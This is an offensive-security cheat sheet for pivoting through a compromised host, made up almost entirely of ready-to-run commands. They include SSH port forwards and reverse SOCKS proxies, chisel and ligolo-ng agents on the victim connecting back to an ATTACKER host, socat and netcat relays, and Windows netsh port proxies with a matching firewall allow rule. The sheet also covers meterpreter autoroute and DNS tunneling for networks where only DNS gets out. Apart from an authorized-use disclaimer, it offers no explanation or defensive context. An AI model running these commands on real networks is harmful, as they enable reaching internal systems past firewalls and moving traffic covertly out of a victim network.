PIVOTING-TUNNELING
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Reach networks you can't touch directly by routing through a compromised host. Authorized engagements only.
SSH TUNNELS#
Local (reach remote svc via your port): ssh -L 9000:10.0.0.5:3389 user@pivot Remote (expose your svc on the pivot): ssh -R 9000:127.0.0.1:80 user@pivot Dynamic SOCKS proxy: ssh -D 1080 user@pivot then: proxychains nmap -sT -Pn 10.0.0.0/24 (set socks4/5 127.0.0.1 1080) Via jump host: ssh -J user@pivot user@internal Reverse SOCKS from a box you shelled: ssh -R 1080 user@you (OpenSSH 8.3+)
CHISEL (HTTP tunnel, cross-platform)#
Attacker: chisel server -p 8080 --reverse
Victim: chisel client ATTACKER:8080 R:socks # reverse SOCKS5
chisel client ATTACKER:8080 R:3389:10.0.0.5:3389 # reverse port fwd
Forward: chisel client ATTACKER:8080 1080:socks
LIGOLO-NG (tun interface -- cleanest)#
Attacker (proxy): ip tuntap add user $USER mode tun ligolo ; ip link set ligolo up ligolo-proxy -selfcert Agent on pivot: agent -connect ATTACKER:11601 -ignore-cert In proxy console: session -> start ; then on attacker: ip route add 10.0.0.0/24 dev ligolo # now reach the subnet natively Listener (reverse to internal): listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
SOCAT / NETCAT RELAYS#
socat TCP-LISTEN:9000,fork TCP:10.0.0.5:3389 Relay in two hops: socat TCP-LISTEN:8080,fork TCP:nexthop:8080 netcat relay: mknod bp p; nc -l 8080 0<bp | nc tgt 80 1>bp
WINDOWS NATIVE#
netsh interface portproxy add v4tov4 listenport=9000 connectaddress=10.0.0.5 connectport=3389 netsh advfirewall firewall add rule name=p dir=in action=allow protocol=TCP localport=9000 plink.exe -ssh -D 1080 user@you # SSH SOCKS from Windows Remove: netsh interface portproxy reset
METASPLOIT / OTHERS#
meterpreter: run autoroute -s 10.0.0.0/24 ; then route print portfwd add -l 9000 -p 3389 -r 10.0.0.5 ; socks proxy aux module sshuttle (VPN-over-ssh): sshuttle -r user@pivot 10.0.0.0/24 dnscat2 / iodine for DNS tunneling when only DNS egresses.
PROXYCHAINS CONFIG#
/etc/proxychains4.conf: [ProxyList] socks5 127.0.0.1 1080 Use -q (quiet); set proxy_dns; TCP-connect scans only through SOCKS (no -sS).